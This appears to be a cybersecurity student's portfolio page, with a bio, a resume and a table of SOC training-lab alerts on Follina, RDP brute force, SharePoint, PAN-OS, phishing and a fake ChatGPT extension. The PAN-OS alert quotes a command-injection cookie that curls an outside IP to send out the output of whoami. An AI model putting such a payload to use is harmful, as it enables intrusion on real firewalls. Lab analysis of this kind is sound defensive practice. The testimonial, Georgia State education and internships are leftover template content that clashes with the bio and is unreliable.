About me

Final-year B.Tech student specializing in Cybersecurity at Veltech University, Chennai. I have a strong passion for cybersecurity, focusing on areas like Security Operations Center, malware analysis, threat detection, and network security. My academic journey has provided me with a solid foundation in computer science and hands-on experience with cybersecurity tools and practices. I'm currently working on several projects that involve ELK stack lab setup, Valid and strength password checker, and Splunk lab setup. .

While my primary interest lies in cybersecurity, I also have experience working with Python, SQL, and assembly language for reverse engineering. I enjoy applying these skills to solve real-world challenges. In the future, I aim to continue exploring advanced topics in cybersecurity, contributing to secure system designs, and expanding my knowledge in threat modeling and incident response and also i enjoy to develop responsive websites using AI tools.

My journey reflects a continuous pursuit of knowledge, with a strong focus on practical application through projects and research.

Active Engagements

  • design icon

    Threat Detection and Response

    Specialized in detecting and responding to cyber threats using industry-leading tools and methodologies to ensure robust security defenses.

  • Web development icon

    Malware Analysis

    Analyzing and reversing malware to understand attack vectors and behaviors, enabling proactive defense mechanisms.

  • mobile app icon

    Network Traffic Analysis

    Expert in analyzing network traffic to detect anomalies, malicious activities, and potential threats using advanced tools like Wireshark and tcpdump.

  • camera icon

    Responsive Web Development with AI Tools

    Developing responsive, secure websites using AI-powered tools, focusing on security best practices and modern design principles.

Daniel lewis
quote icon

Daniel lewis

Richard was hired to create a corporate identity. We were very pleased with the work done. She has a lot of experience and is very concerned about the needs of client. Lorem ipsum dolor sit amet, ullamcous cididt consectetur adipiscing elit, seds do et eiusmod tempor incididunt ut laborels dolore magnarels alia.

Resume

Education

  1. Georgia State University, B.B.A

    Aug. 2017 — Dec. 2021

    Relevant Coursework: Intro to Programming: Python, Database Management Systems, Systems Analysis, Managing IT Projects, Strategic Management, Business Analysis, Intro to Security, Systems and Network Security, Cybersecurity Tools

Experience

  1. Blockchain Intern

    Sept. 2021 — Dec. 2021

    ♡ Research and share upcoming NFT projects

    ♡ Investigate implementations of smart contracts using Solidity

    ♡ Develop an NFT collection to a React application by writing a smart contract utilizing Solidity

  2. Technology Innovation Intern

    June 2021 — Aug. 2021

    ♡ Conducted PCA analysis through K-means clustering to find correlations within collected data set

    ♡ Developed a front-end web application utilizing HTML and CSS, implemented heat mapping analytics using Heatmap.js

    ♡ Developed bots utilizing PyAutoGUI to analyze and differentiate between bot and human users interacting on a website

  3. Research Assistant

    Jan. 2018 — May 2018

    ♡ Analyzed fMRI scans using SPM8 through MATLAB

    ♡ Worked alongside graduate students studying schizophrenia to find correlations between brain scans of schizophrenic patients and non-schizophrenic patients

My skills

  • Web design
    80%
  • Graphic design
    70%
  • Branding
    90%
  • WordPress
    50%

Portfolio

My Projects

Alerts

Priority Time Rule Name Event ID Event Type GitHub
Medium Oct, 31, 2024, 06:56 AM ⭐ SOC173 - Follina 0-Day Detected 123 Malware GitHub

EventID: 123

Event Time: Jun, 02, 2022, 03:22 PM

Rule: SOC173-Follina 0-Day Detected

Level: Security Analyst

Source Address: 172.16.17.39

Hostname: JonasPRD

File Name: 05-2022-0438.doc

File Hash: 52945afldef85b171870b31fa4782e52

File Size: 10.01 Kb

AV Action: Allowed

Alert Trigger Reason: msdt.exe executed after Office document

Medium Oct, 28, 2024, 06:58 PM SOC176 - RDP Brute Force Detected 234 Brute Force GitHub

EventID: 234

Event Time: Mar, 07, 2024, 11:44 AM

Rule: SOC176 - RDP Brute Force Detected

Level: Security Analyst

Source IP Address: 218.92.0.56

Destination IP Address: 172.16.17.148

Destination Hostname: Matthew

Protocol: RDP

Firewall Action: Allowed

Alert Trigger Reason: Login failure from a single source with different non-existing accounts

Critical Oct, 28, 2024, 03:13 PM SOC227 - Microsoft SharePoint Server Elevation of Privilege - Possible CVE-2023-29357 Exploitation 189 Web attack GitHub

EventID: 189

Event Time: Oct, 06, 2023, 08:05 PM

Rule: SOC227 - Microsoft SharePoint Server Elevation of Privilege - Possible CVE-2023-29357 Exploitation

Level: Security Analyst

Hostname: MS-SharePointServer

Destination IP Address: 172.16.17.233

Source IP Address: 39.91.166.222

HTTP Request Method: GET

Requested URL: Lapi/web/siteusers

User-Agent: python-requests/2.28.1

Alert Trigger Reason: This activity may be indicative of an attempt to exploit the CVE-2023-29357 vulnerability, which could potentially lead to unauthorized access and privilege escalation within the SharePoint server.

Device Action: Allowed

High Oct, 27, 2024, 04:05 AM SOC104 - Malware Detected 36 Malware attack GitHub

EventID: SOC104

Event Time: Dec, 01, 2020, 10:23 AM

Rule: Malware Detected

Level: Security Analyst

Source Address: 10.15.15.18

Source Hostname: AdamPRD

File Name: Invoice.exe

File Hash: f83fb9ce6a83da58b20685c1d7ele546

File Size: 473.00 KB

Device Action: Allowed

Medium Oct, 29, 2024, 08:23 AM SOC251 - Quishing Detected (QR Code Phishing) 214 Exchange GitHub

EventID: SOC251

Event Time: Jan, 01, 2024, 12:37 PM

Rule: Quishing Detected (QR Code Phishing)

Level: Security Analyst

SMTP Address: 158.69.201.47

Source Address: security@microsecmfa.com

Destination Address: Claire@letsdefend.io

E-mail Subject: New Year's Mandatory Security Update Implementing Multi-Factor Authentication (MFA)

Device Action: Allowed

Critical Oct, 27, 2024, 08:55 AM ⭐ SOC274 - Palo Alto Networks PAN-OS Command Injection Vulnerability Exploitation (CVE-2024-3400) 249 Web Attack GitHub

EventID: SOC274

Event Time: Apr, 18, 2024, 03:09 AM

Rule: Palo Alto Networks PAN-OS Command Injection Vulnerability Exploitation (CVE-2024-3400)

Level: Security Analyst

Hostname: PA-Firewall-01

Destination IP Address: 172.16.17.139

Source IP Address: 144.172.79.92

HTTP Request Method: POST

Requested URL: 172.16.17.139/global-protect/login.esp

cookie: SESSID=////opt/panlogs/tmp/device_telemetry/hour/aaa curl$(IFS)144.172.79.92:4444?user=$(whoami)

Alert Trigger Reason: Characteristics exploit pattern Detected on Cookie and Request, indicative exploitation of the CVE-2024-3400

Device Action: Allowed

High Oct, 29, 2024, 05:00 AM SOC202 - FakeGPT Malicious Chrome Extension 153 Data Leakage GitHub

EventID: SOC202

Event Time: May, 29, 2023, 01:01 PM

Rule: FakeGPT Malicious Chrome Extension

Level: Security Analyst

Hostname: Samuel

IP Address: 172.16.17.173

File Name: hacfaophiklaeolhnmckojjjjbnappen.crx

File Path: C:\Users\LetsDefend\Download\hacfaophiklaeolhnmckojjjjbnappen.crx

File Hash: 7421f9abe5e618a0d517861f4709df53292a5f137053a227bfb4eb8e152a4669

Command Line: chrome.exe --single-argument C:\Users\LetsDefend\Download\hacfaophiklaeolhnmckojjjjbnappen.crx

Trigger Reason: Suspicious extension added to the browser.

Device Action: Allowed

Medium Oct, 24, 2024, 05:57 AM ⭐ SOC282 - Phishing Alert - Deceptive Mail Detected 257 Exchange GitHub

EventID: 257

Event Time: May, 13, 2024, 09:22 AM

Rule: SOC282 - Phishing Alert - Deceptive Mail Detected

Level: Security Analyst

SMTP Address: free@coffeeshooop.com

Source Address: 103.80.134.63

Destination Address: Felix@letsdefend.io

E-mail Subject: Free Coffee Voucher

Device Action: Allowed

CTF